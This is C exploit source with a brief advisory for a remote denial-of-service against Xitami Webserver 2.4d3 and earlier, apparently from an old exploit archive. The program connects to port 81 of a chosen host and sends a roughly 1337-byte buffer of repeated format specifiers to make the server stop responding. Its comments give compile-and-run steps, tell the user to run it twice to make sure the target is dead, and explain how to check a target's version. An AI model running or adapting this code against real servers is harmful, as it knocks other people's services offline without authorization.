Xitami Webserver v2.4d3 and below are vulnerable to a remote dos attack. Sending malformed data to port 81 will cause the server to stop responding. Tested agasinst Xitami on Win95/98/NT4.0.
653b5e0f1e56431fd83d62fd7b7a396d717022dbc75540f5d88d7313aac195e5
/*
CODE IS CRAP, COULD BE OPTIMISED/MADE PRETTIER, BUT I DID NOT BOTHER. SUE ME.
DoS attack, Xitami v2.4d3 and below (makes xitami give you crash-bug dialog).
^-------^----- for Windows9x/NT/2000(?)
Discovered by: m0zy
Coded by: m0zy
Testing: afr0tits
NO, I DIDNT FUCKING CUT&PASTE!
e-mail: mozy@usa.com
---
## Code tested on:
FreeBSD 4.0-RELEASE, OpenBSD 2.7 (thanx perkinz.org).
Wont work on Linux (*BSD > Linux, by the way). Port it yourself.
**
root@localhost# gcc -o xitdos xitdos.c
root@localhost# ./xitdos www.example.com
**
If you get a warning with something like "passing arg 2..."
just ignore it.
---
Just for safety's sake, ./try twice (to make sure the box is dead).
If you get a "Broken pipe" error when you ./run this shit, you're out
of luck, you're trying to DoS a newer version of Xitami (above 2.4d3),
which it wont work for.
To find out the version of Xitami you are trying to DoS, goto the url and
access /cgi-bin/testcgi.exe (eg: http://www.example.com/cgi-bin/testcgi.exe)
Then look for "SERVER_VERSION" that will tell you what version it is.
---
Basic Explanation (lame-man's terms): Send any string, followeb by
%s%d%u looped 222 times, which is about 1332 bytes (I think), you can
loop it longer, but 222 is the minimum from my experience, to port 81,
and BEWM@$#!@%...you get a "Xitami Crash Recovery" dialog box on the
server machine. The error looks something like this:
"05/Jun/2000:23:27:46 -0800 Xitami v2.4c3
Abort at xilrwp:Read-App-Name-And-Start-Router: (Peer-Startup, Sock-Input-Ok-Event)"
You get 3 buttons - " |RESTART| |ABORT| |DEBUG| "
If there is no one currently at the console on the server to restart
the machine, you did it, you DoS'ed the b0x.
Technically, the server doesnt crash, but instead prevents any more
connections from going through on port 80. Now thats good error-checking
code for ya.
---
The ever-so-popular Greets (in NO order!):
lyp0x, Max0r, oreo, nugz, xess0r, coldsnap, con, seg, snownix, koi,
alphanuma, juso, burnyd, sipher, all of #flem and #sigint on EFnet,
and all the other lamuhs I didnt mention.
Oh yeah, get on irc.perkinz.org - #perkinz.
Crazy canucks.
*/
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
main(argc, argv)
int argc;
char *argv[];
{
int sock, val, cnt;
struct sockaddr_in mmk;
char buf[1337];
struct hostent *host, *gethostbyname();
if (argc < 2){
printf("--> ./xitdos [hostname]\n");
printf("--> Xitami DoS coded by m0zy.\n");
printf("--> E-Mail: mozy@usa.com\n");
return -1;}
if ((sock=socket(AF_INET, SOCK_STREAM, 0))<0){
printf("network sockets fudged up");
return -1;}
////////////////////////////
argv[2] = "81";
host = gethostbyname(argv[1]);
mmk.sin_port = htons(atoi(argv[2]));
mmk.sin_family = AF_INET;
mmk.sin_addr = *((struct in_addr *)host->h_addr);
bzero(&(mmk.sin_zero), 8);
///////////////////////////
printf("-\n- If you get a \"Broken Pipe\" error, you're shit outta luck, try another server.\n");
printf("-\n- connecting to: %s \n- using port: %d\n-\n", argv[1],ntohs(mmk.sin_port));
if (host==NULL){
printf(" -!!!- error, unknown hostname(%s)?", argv[1]);
return -1;}
else{
// printf(" - hostname - %s\n", host->h_name);
memcpy(&mmk.sin_addr.s_addr, host->h_addr_list[0],host->h_length);
printf(" - host adress - %s\n", inet_ntoa(mmk.sin_addr));
if((connect(sock, &mmk, sizeof(mmk)))<0){
printf(" -!!!-network connect failed(unknonw hostname or no response from server)\n\n");
return -1;}
memset(buf, 0, sizeof(buf));
///////////////////////////////////
///// Heh, the main 31337 DoS part...stare at it in *awe*.
///
strcpy(buf, "test %s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u!
%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u%s%d%u");
// ^--heh, pheer, that makes exactly 1337 bytes to be sent!
write(sock, buf, sizeof(buf));
///
/////
////////////////////////////////////
printf(" - network received DoS data!\n-\n");
write (sock, buf, 0);
close (sock);
return 0;
}
}